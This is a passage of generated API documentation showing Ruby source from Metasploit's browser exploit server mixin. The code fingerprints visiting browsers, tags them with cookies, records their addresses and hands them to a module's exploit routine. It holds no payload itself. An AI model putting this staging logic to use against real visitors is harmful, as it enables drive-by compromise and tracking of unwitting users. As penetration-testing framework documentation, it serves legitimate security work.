<span class='kw'>def</span> <span class='id identifier rubyid_on_request_exploit'>on_request_exploit</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_browser_info'>browser_info</span><span class='rparen'>)</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>NoMethodError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Module must define its own on_request_exploit method</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="on_request_uri-instance_method">
#<strong>on_request_uri</strong>(cli, request) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Handles exploit stages.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 541</span>
<span class='kw'>def</span> <span class='id identifier rubyid_on_request_uri'>on_request_uri</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='kw'>case</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_uri'>uri</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_get_resource'>get_resource</span><span class='period'>.</span><span class='id identifier rubyid_chomp'>chomp</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>/</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='comment'>#
</span> <span class='comment'># This is the information gathering stage
</span> <span class='comment'>#
</span> <span class='kw'>if</span> <span class='id identifier rubyid_browser_profile'>browser_profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_retrieve_tag'>retrieve_tag</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_send_redirect'>send_redirect</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_get_module_resource'>get_module_resource</span><span class='rparen'>)</span>
<span class='kw'>return</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Gathering target information for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_tag'>tag</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>20</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='int'>5</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ua'>ua</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>User-Agent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Sending HTML response to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_html'>html</span> <span class='op'>=</span> <span class='id identifier rubyid_get_detection_html'>get_detection_html</span><span class='lparen'>(</span><span class='id identifier rubyid_ua'>ua</span><span class='rparen'>)</span>
<span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_html'>html</span><span class='comma'>,</span> <span class='lbrace'>{</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Set-Cookie</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_cookie_header'>cookie_header</span><span class='lparen'>(</span><span class='id identifier rubyid_tag'>tag</span><span class='rparen'>)</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='embexpr_beg'>#{</span><span class='ivar'>@flash_swf</span><span class='embexpr_end'>}</span><span class='regexp_end'>/</span></span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Sending SWF used for Flash detection to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_swf'>swf</span> <span class='op'>=</span> <span class='id identifier rubyid_load_swf_detection'>load_swf_detection</span>
<span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_swf'>swf</span><span class='comma'>,</span> <span class='lbrace'>{</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Type</span><span class='tstring_end'>&#39;</span></span><span class='op'>=&gt;</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>application/x-shockwave-flash</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Cache-Control</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>no-cache, no-store</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Pragma</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>no-cache</span><span class='tstring_end'>&#39;</span></span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='embexpr_beg'>#{</span><span class='ivar'>@info_receiver_page</span><span class='embexpr_end'>}</span><span class='regexp_end'>/</span></span>
<span class='comment'>#
</span> <span class='comment'># The detection code will hit this if Javascript is enabled
</span> <span class='comment'>#
</span> <span class='id identifier rubyid_vprint_status'>vprint_status</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Info receiver page called from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_process_browser_info'>process_browser_info</span><span class='lparen'>(</span><span class='symbol'>:script</span><span class='comma'>,</span> <span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbrace'>{</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Set-Cookie</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_cookie_header'>cookie_header</span><span class='lparen'>(</span><span class='id identifier rubyid_tag'>tag</span><span class='rparen'>)</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='embexpr_beg'>#{</span><span class='ivar'>@noscript_receiver_page</span><span class='embexpr_end'>}</span><span class='regexp_end'>/</span></span>
<span class='comment'>#
</span> <span class='comment'># The detection code will hit this instead of Javascript is disabled
</span> <span class='comment'># Should only be triggered by the img src in &lt;noscript&gt;
</span> <span class='comment'>#
</span> <span class='id identifier rubyid_process_browser_info'>process_browser_info</span><span class='lparen'>(</span><span class='symbol'>:headers</span><span class='comma'>,</span> <span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='embexpr_beg'>#{</span><span class='ivar'>@exploit_receiver_page</span><span class='embexpr_end'>}</span><span class='regexp_end'>/</span></span>
<span class='comment'>#
</span> <span class='comment'># This sends the actual exploit. A module should define its own
</span> <span class='comment'># on_request_exploit() to get the target information
</span> <span class='comment'>#
</span> <span class='id identifier rubyid_tag'>tag</span> <span class='op'>=</span> <span class='id identifier rubyid_retrieve_tag'>retrieve_tag</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Serving exploit to user </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'> with tag </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tag'>tag</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_profile'>profile</span> <span class='op'>=</span> <span class='id identifier rubyid_browser_profile'>browser_profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_tag'>tag</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_profile'>profile</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Browser visiting directly to the exploit URL is forbidden.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='symbol'>:tried</span><span class='rbracket'>]</span> <span class='op'>&amp;&amp;</span> <span class='op'>!</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Retries</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'> with tag \&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tag'>tag</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; wants to retry the module, not allowed.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='symbol'>:tried</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Setting target \&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tag'>tag</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; to :tried.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_try_set_target'>try_set_target</span><span class='lparen'>(</span><span class='id identifier rubyid_profile'>profile</span><span class='rparen'>)</span>
<span class='id identifier rubyid_bad_reqs'>bad_reqs</span> <span class='op'>=</span> <span class='id identifier rubyid_get_bad_requirements'>get_bad_requirements</span><span class='lparen'>(</span><span class='id identifier rubyid_profile'>profile</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_bad_reqs'>bad_reqs</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_browser_info'>browser_info</span> <span class='op'>=</span> <span class='id identifier rubyid_profile'>profile</span><span class='period'>.</span><span class='id identifier rubyid_dup'>dup</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_method'>method</span><span class='lparen'>(</span><span class='symbol'>:on_request_exploit</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_call'>call</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_browser_info'>browser_info</span><span class='rparen'>)</span>
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="BrowserExploitServer/BESException.html" title="Msf::Exploit::Remote::BrowserExploitServer::BESException (class)">BESException</a></span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BESException</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>BESException: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Exploit requirement(s) not met: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_bad_reqs'>bad_reqs</span> <span class='op'>*</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>, </span><span class='tstring_end'>&#39;</span></span><span class='embexpr_end'>}</span><span class='tstring_content'>. For more info: http://r-7.co/PVbcgx</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_bad_reqs'>bad_reqs</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='symbol'>:vuln_test</span><span class='rparen'>)</span>
<span class='id identifier rubyid_error_string'>error_string</span> <span class='op'>=</span> <span class='lparen'>(</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_module_info'>module_info</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BrowserRequirements</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='symbol'>:vuln_test_error</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_error_string'>error_string</span><span class='period'>.</span><span class='id identifier rubyid_present?'>present?</span>
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='id identifier rubyid_error_string'>error_string</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'> has requested an unknown path: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_uri'>uri</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="process_browser_info-instance_method">
#<strong>process_browser_info</strong>(source, cli, request) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Registers target information to @target_profiles</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>source</span>
<span class='type'>(<tt>Symbol</tt>)</span>
&mdash;
<div class='inline'>
<p>Either :script, or :headers</p>
</div>
</li>
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 291</span>
<span class='kw'>def</span> <span class='id identifier rubyid_process_browser_info'>process_browser_info</span><span class='lparen'>(</span><span class='id identifier rubyid_source'>source</span><span class='comma'>,</span> <span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_tag'>tag</span> <span class='op'>=</span> <span class='id identifier rubyid_retrieve_tag'>retrieve_tag</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_browser_profile'>browser_profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_tag'>tag</span><span class='rbracket'>]</span> <span class='op'>||=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span>
<span class='id identifier rubyid_profile'>profile</span> <span class='op'>=</span> <span class='id identifier rubyid_browser_profile'>browser_profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_tag'>tag</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='symbol'>:source</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_source'>source</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='id identifier rubyid_found_ua_name'>found_ua_name</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_found_ua_ver'>found_ua_ver</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='comment'># Gathering target info from the detection stage
</span> <span class='kw'>case</span> <span class='id identifier rubyid_source'>source</span>
<span class='kw'>when</span> <span class='symbol'>:script</span>
<span class='comment'># Gathers target data from a POST request
</span> <span class='id identifier rubyid_parsed_body'>parsed_body</span> <span class='op'>=</span> <span class='const'>CGI</span><span class='op'>::</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_decode_base64'>decode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_body'>body</span><span class='rparen'>)</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Received sniffed browser data over POST from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_line'>vprint_line</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_parsed_body'>parsed_body</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_parsed_body'>parsed_body</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_k'>k</span><span class='comma'>,</span> <span class='id identifier rubyid_v'>v</span><span class='op'>|</span> <span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='period'>.</span><span class='id identifier rubyid_to_sym'>to_sym</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='lparen'>(</span><span class='id identifier rubyid_v'>v</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>null</span><span class='tstring_end'>&#39;</span></span> <span class='op'>?</span> <span class='kw'>nil</span> <span class='op'>:</span> <span class='id identifier rubyid_v'>v</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='id identifier rubyid_found_ua_name'>found_ua_name</span> <span class='op'>=</span> <span class='id identifier rubyid_parsed_body'>parsed_body</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ua_name</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_found_ua_ver'>found_ua_ver</span> <span class='op'>=</span> <span class='id identifier rubyid_parsed_body'>parsed_body</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ua_ver</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>when</span> <span class='symbol'>:headers</span>
<span class='comment'># Gathers target data from headers
</span> <span class='comment'># This may be less accurate, and most likely less info.
</span> <span class='id identifier rubyid_fp'>fp</span> <span class='op'>=</span> <span class='id identifier rubyid_fingerprint_user_agent'>fingerprint_user_agent</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>User-Agent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='comment'># Module has all the info it needs, ua_string is kind of pointless.
</span> <span class='comment'># Kill this to save space.
</span> <span class='id identifier rubyid_fp'>fp</span><span class='period'>.</span><span class='id identifier rubyid_delete'>delete</span><span class='lparen'>(</span><span class='symbol'>:ua_string</span><span class='rparen'>)</span>
<span class='id identifier rubyid_fp'>fp</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_k'>k</span><span class='comma'>,</span> <span class='id identifier rubyid_v'>v</span><span class='op'>|</span>
<span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='period'>.</span><span class='id identifier rubyid_to_sym'>to_sym</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_v'>v</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_found_ua_name'>found_ua_name</span> <span class='op'>=</span> <span class='id identifier rubyid_fp'>fp</span><span class='lbracket'>[</span><span class='symbol'>:ua_name</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_found_ua_ver'>found_ua_ver</span> <span class='op'>=</span> <span class='id identifier rubyid_fp'>fp</span><span class='lbracket'>[</span><span class='symbol'>:ua_ver</span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='comment'># Other detections
</span> <span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='symbol'>:proxy</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_has_proxy?'>has_proxy?</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='symbol'>:language</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept-Language</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='comment'># Basic tracking
</span> <span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='symbol'>:address</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span>
<span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='symbol'>:module</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_fullname'>fullname</span>
<span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='symbol'>:created_at</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span>
<span class='id identifier rubyid_report_client'>report_client</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='symbol'>:host</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='comma'>,</span>
<span class='symbol'>:ua_string</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>User-Agent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='comma'>,</span>
